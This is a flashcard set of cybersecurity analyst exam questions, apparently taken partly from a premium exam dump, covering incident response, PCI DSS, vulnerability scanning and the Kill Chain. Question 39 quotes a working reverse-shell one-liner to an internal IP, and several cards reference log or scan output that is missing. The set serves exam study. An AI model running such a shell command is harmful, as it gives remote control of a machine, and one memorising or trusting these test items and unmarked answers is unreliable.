All questions without description (e.g. Question #1) are from the premium version of Exam Topics. I always choosed the community answer if possible for them. The rest is from the specific documents, written in the header of each question.
Which of the following security operations tasks are ideal for automation?
Answer
A. Suspicious file analysis: Look for suspicious-looking graphics in a folder. Create subfolders in the original folder based on category of graphics found. Move the suspicious graphics to the appropriate subfolder
B. Firewall IoC block actions: Examine the firewall logs for IoCs from the most recently published zero-day exploit Take mitigating actions in the firewall to block the behavior found in the logs Follow up on any false positives that were caused by the block rules
C. Security application user errors: Search the error logs for signs of users having trouble with the security application Look up the user's phone number - Call the user to help with any questions about using the application
D. Email header analysis: Check the email header for a phishing confidence metric greater than or equal to five Add the domain of sender to the block list Move the email to quarantine
Card 22
Question
Question #22
An organization has experienced a breach of customer transactions. Under the terms of PCI DSS, which of the following groups should the organization report the breach to?
Answer
A. PCI Security Standards Council
D. Card issuer
B. Local law enforcement
C. Federal law enforcement
Card 23
Question
Question #23
Which of the following is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system?
Answer
B. Number of exploits by tactic
A. Mean time to detect
C. Alert volume
D. Quantity of intrusion attempts
Card 24
Question
Question #24
A company is implementing a vulnerability management program and moving from an on-premises environment to a hybrid IaaS cloud environment. Which of the following implications should be considered on the new hybrid environment?
Answer
B. Cloud-specific misconfigurations may not be detected by the current scanners
A. The current scanners should be migrated to the cloud
C. Existing vulnerability scanners cannot scan IaaS systems
D. Vulnerability scans on cloud environments should be performed from the cloud
Card 25
Question
Question #25
A security alert was triggered when an end user tried to access a website that is not allowed per organizational policy. Since the action is considered a terminable offense, the SOC analyst collects the authentication logs, web logs, and temporary files, reflecting the web searches from the user's workstation, to build the case for the investigation. Which of the following is the best way to ensure that the investigation complies with HR or privacy policies?
Answer
B. Ensure that the case details do not reflect any user-identifiable information Password protect the evidence and restrict access to personnel related to the investigation
A. Create a timeline of events detailing the date stamps, user account hostname and IP information associated with the activities
D. Notify the SOC manager for awareness after confirmation that the activity was intentional
C. Create a code name for the investigation in the ticketing system so that all personnel with access will not be able to easily identify the case as an HR-related investigation
Card 26
Question
Question #26
Which of the following is the first step that should be performed when establishing a disaster recovery plan?
Answer
B. Determine the site to be used during a disaster
A. Agree on the goals and objectives of the plan
C. Demonstrate adherence to a standard disaster recovery process
D. Identify applications to be run during a disaster
Card 27
Question
Question #27
A technician identifies a vulnerability on a server and applies a software patch. Which of the following should be the next step in the remediation process?
Answer
B. Implementation
A. Testing
D. Rollback
C. Validation
Card 28
Question
Question #28
The analyst reviews the following endpoint log entry:
Which of the following has occurred?
Answer
B. Rename computer
D. Privilege escalation
A. Registry change
C. New account introduced
Card 29
Question
Question #29
A security program was able to achieve a 30% improvement in MTTR by integrating security controls into a SIEM. The analyst no longer had to jump between tools. Which of the following best describes what the security program did?
Answer
C. Threat feed combination
B. Security control plane
D. Single pane of glass
A. Data enrichment
Card 30
Question
Question #30
Due to reports of unauthorized activity that was occurring on the internal network, an analyst is performing a network discovery. The analyst runs an Nmap scan against a corporate network to evaluate which devices were operating in the environment. Given the following output:
Which of the following choices should the analyst look at first?
Answer
B. officerckuplayer.lan (192.168.86.22)
A. wh4dc-748gy.lan (192.168.86.152)
D. xlaptop.lan (192.168.86.249)
E. p4wnp1_aloa.lan (192.168.86.56)
C. imaging.lan (192.168.86.150)
Card 31
Question
Question #31
When starting an investigation, which of the following must be done first?
Answer
B. Secure the scene
D. Interview the witnesses
A. Notify law enforcement
C. Seize all related evidence
Card 32
Question
Question #32
Which of the following describes how a CSIRT lead determines who should be communicated with and when during a security incident?
Answer
D. Subject matter experts on the team should communicate with others within the specified area of expertise
B. Management level members of the CSIRT should make that decision
C. The lead has the authority to decide who to communicate with at any t me
A. The lead should review what is documented in the incident response policy or plan
Card 33
Question
Question #33
A new cybersecurity analyst is tasked with creating an executive briefing on possible threats to the organization. Which of the following will produce the data needed for the briefing?
Answer
A. Firewall logs
B. Indicators of compromise
C. Risk assessment
D. Access control lists
Card 34
Question
Question #34
An analyst notices there is an internal device sending HTTPS traffic with additional characters in the header to a known-malicious IP in another country. Which of the following describes what the analyst has noticed?
Answer
B. Cross-site scripting
A. Beaconing
C. Buffer overflow
D. PHP traversal
Card 35
Question
Question #35
A security analyst is reviewing a packet capture in Wireshark that contains an FTP session from a potentially compromised machine. The analyst sets the following display filter: ftp. The analyst can see there are several RETR requests with 226 Transfer complete responses, but the packet list pane is not showing the packets containing the file transfer itself. Which of the following can the analyst perform to see the entire contents of the downloaded files?
Answer
A. Change the display filter to ftp.active.port
B. Change the display filter to tcp.port==20
D. Navigate to the File menu and select FTP from the Export objects option
C. Change the display filter to ftp-data and follow the TCP streams
Card 36
Question
Question #36
A SOC manager receives a phone call from an upset customer. The customer received a vulnerability report two hours ago: but the report did not have a follow-up remediation response from an analyst. Which of the following documents should the SOC manager review to ensure the team is meeting the appropriate contractual obligations for the customer?
Answer
D. Limitation of liability
B. MOU
A. SLA
C. NDA
Card 37
Question
Question #37
Which of the following phases of the Cyber Kill Chain involves the adversary attempting to establish communication with a successfully exploited target?
Answer
C. Exploitation
B. Actions on objectives
A. Command and control
D. Delivery
Card 38
Question
Question #38
A company that has a geographically diverse workforce and dynamic IPs wants to implement a vulnerability scanning method with reduced network traffic. Which of the following would best meet this requirement?
Answer
A. External
B. Agent-based
C. Non-credentialed
D. Credentialed
Card 39
Question
Question #39
A security analyst detects an exploit attempt containing the following command: sh -i >& /dev/udp/10.1.1.1/4821 0>$l
Which of the following is being attempted?
Answer
D. SQL injection
A. RCE
C. XSS
B. Reverse shell
Card 40
Question
Question #40
An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. Which of the following factors would an analyst most likely communicate as the reason for this escalation?
Answer
B. Weaponization
A. Scope
D. Asset value
C. CVSS
How to use this set
Read the preview and check whether the content and answers suit your learning goal. You can add the public set to your sets to study it. Your account shows the available actions.